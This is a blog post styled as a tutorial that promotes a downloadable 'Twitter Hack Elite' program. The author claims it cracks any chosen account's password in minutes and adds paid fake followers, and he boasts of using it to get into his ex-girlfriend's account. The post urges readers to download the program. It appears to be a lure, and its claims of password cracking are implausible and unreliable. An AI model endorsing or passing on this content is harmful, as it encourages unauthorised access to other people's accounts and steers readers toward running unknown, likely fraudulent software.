Choose Your Right Way...


  • Home
  • Tricks
  • My Other Blogs
  • Videos
  • Contact
  • About Me
  • How to Hack a Twitter Account [Tutorial]

    In case you are wondering how to hack a twitter account, this tutorial is for you. It happened some time back that my twitter account got hacked. It was none other than my ex-girlfriend who logged into my twitter account and changed both my password and my email address. I still cannot understand the reason she did so but I realize I am the ultimate fool here for not having changed my twitter password after we broke up late last year. Anyway, I happened to lay hands on this hack twitter elite program via a geek friend. I was really desperate back then and decided to try it. It worked!! I really could not believe it at first but it did really work! So, I quickly changed my email address back and changed my password of course. Hell! I even used it to mess with my ex's account :) how to hack a twitter account.twitter_hack

    Now, this hack twitter elite program has one more functionality other than being able to hack twitter accounts. You can also use it to gain more followers. According to my geek friend, it uses some underground network where people get paid to add others. So both me and my "artificial" follower are happy. It helped me gain a couple hundred followers thereby inflating my popularity. Of course my close friends started asking me how I had suddenly become the most popular guy. So here I write this blog post explaining to them (you will recognize yourselves!) and pretty much anybody who has sensed that this sort of stuff existed. There was no way I was going to say how to hack a twitter account my personal blog because I do not want people to know what I had done! So I basically created this new blog to share it!

    How to hack a twitter account?


    The software I used can be downloaded from here: Twitter Hack Elite Download

    After downloading and installing the software, you will see this screen

    how to hack twitter account?

    How to hack twitter account: Twitter Hack Elite Start Screen


    Twitter Hack 1: Hack into an account

    For this tutorial I used a dummy twitter account. This is the screen that is shown after you have chosen your target account.

    how to hack twitter account?

    How to hack twitter account: hacking into an account

    It took about 8 mins to run and gave me my correct password!
    Twitter Hack 2: Getting more twitter followers

    The dummy account I used for this test did not have any followers at the beginning but then...

    hack twitter account

    How to hack twitter account: Twitter Follower Hack



    how to hack twitter account

    How to hack twitter account: Twitter Follower hack


    It took around 15 mins to add my 92 followers. The possible disadvantage with it is that you can only add 200 at one time but you can use it multiple times and I think it is better that way if you add a small amount of followers daily.
    Download Twitter Hack Elite

    goodluck…

    Share this post
    • Share to Facebook
    • Share to Twitter
    • Share to Google+
    • Share to Stumble Upon
    • Share to Evernote
    • Share to Blogger
    • Share to Email
    • Share to Yahoo Messenger
    • More...

    0 comments

    :) :-) :)) =)) :( :-( :(( :d :-d @-) :p :o :>) (o) [-( :-? (p) :-s (m) 8-) :-t :-b b-( :-# =p~ :-$ (b) (f) x-) (k) (h) (c) cheer

     
    Copy Right © 2013 999ways. All Rights Reserved by Jaitrix+ . Designed by RedAtom26 .
    Posts RSSComments RSS
    Back to top